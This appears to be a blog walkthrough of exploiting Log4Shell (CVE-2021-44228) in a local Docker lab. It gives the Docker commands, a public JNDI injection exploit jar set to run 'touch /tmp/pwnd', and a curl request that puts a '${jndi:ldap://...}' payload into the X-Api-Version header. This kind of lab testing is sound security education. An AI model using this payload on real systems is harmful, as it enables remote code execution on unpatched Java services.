Recently the vulnerability CVE-2021-44228 has come to light. Many of the posts explain how to check if you are vulnerable, let’s go one step further and test some public exploit.
There is a docker created by “christopherd” which raises a vulnerable application, perfect for testing without affecting anyone.
sudo docker run --rm -p 8080:8080 --name POC ghcr.io/christophetd/log4shell-vulnerable-app
On the other hand we will need to run the exploit and for that we need a server to which our application has network access. The exploit that we will use can be found in the following link:
https://github.com/welk1n/JNDI-Injection-Exploit
For it to work correctly we will run it inside the openjdk docker container.
sudo docker run -it -p 8180:8180 -p 1099:1099 -p 1389:1389 -v $(pwd):/data/exploit --name java openjdk:latest /bin/shOnce inside the container we execute the exploit. Specifically, we will make the exploit create the “pwnd” file inside the tmp directory, to do so we will execute the following command.
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch /tmp/pwnd" -A <IP>
Now let’s get to the fun part… In order to run the exploit, the creator of the vulnerable container tells us that we have to insert the exploit as the value of the “X-Api-Version” header. To do this we are going to use the link that marks the exploit used with the curl…
curl IP:8080 -H 'X-Api-Version: ${jndi:ldap://0.0.0.0:1389/ly7kts}' As we can see below, the exploit has told us that it has received a connection.
But… what caused this connection? Well, if we look at the logs of the vulnerable app we can see that it was our application sending the curl.
Finally if our file has been created we see that our command has been successfully executed. And as we see below :P :
